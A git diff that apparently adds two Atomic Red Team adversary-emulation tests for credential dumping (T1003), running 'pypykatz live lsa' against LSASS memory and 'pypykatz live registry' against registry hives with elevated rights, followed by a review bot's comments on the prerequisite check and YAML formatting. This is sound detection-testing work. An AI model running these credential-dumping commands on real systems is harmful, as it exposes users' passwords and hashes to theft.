diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml
index 0c01166a..fe9d84bc 100644
--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -295,4 +295,32 @@ atomic_tests:
     cleanup_command: |
       rm "#{output_folder}\sam"
       rm "#{output_folder}\system"
-      rm "#{output_folder}\security"
\ No newline at end of file
+      rm "#{output_folder}\security"
+
+- name: LSASS read with pypykatz
+  description: |
+    Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::
+    #https://github.com/skelsec/pypykatz and it's dependencies must be installed
+  supported_platforms:
+  - windows
+  executor:
+    name: command_prompt
+    elevation_required: true
+    prereq_command: |
+      py -3
+    command: |
+      pypykatz live lsa
+
+- name: Registry parse with pypykatz
+  description: |
+    Parses registry hives to obtain stored credentials
+    #https://github.com/skelsec/pypykatz and it's dependencies must be installed
+  supported_platforms:
+  - windows
+  executor:
+    name: command_prompt
+    elevation_required: true
+    prereq_command: |
+      py -3
+    command: |
+      pypykatz live registry
\ No newline at end of file
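Review bot: The `prereq_command` of both new tests (`py -3`) does not check the dependency the description says is required; with no script argument it starts an interactive interpreter, so the prerequisite step will either wait on stdin or succeed on any host with Python, and the test then fails at `command` with a confusing "pypykatz is not recognized" instead of a clear unmet-prerequisite result. Replace it in both tests with something that exits non-zero when the module is missing, e.g. `py -3 -c "import pypykatz"`. The `#https://...` line inside the `description: |` block scalar is literal text, not a YAML comment, so the install note ends up in the rendered description; either drop the leading `#` or move the note into a field the framework shows for prerequisites (and `it's` should be `its`). The new side also still ends without a trailing newline, so the next addition will produce the same noisy `\ No newline at end of file` churn this hunk shows.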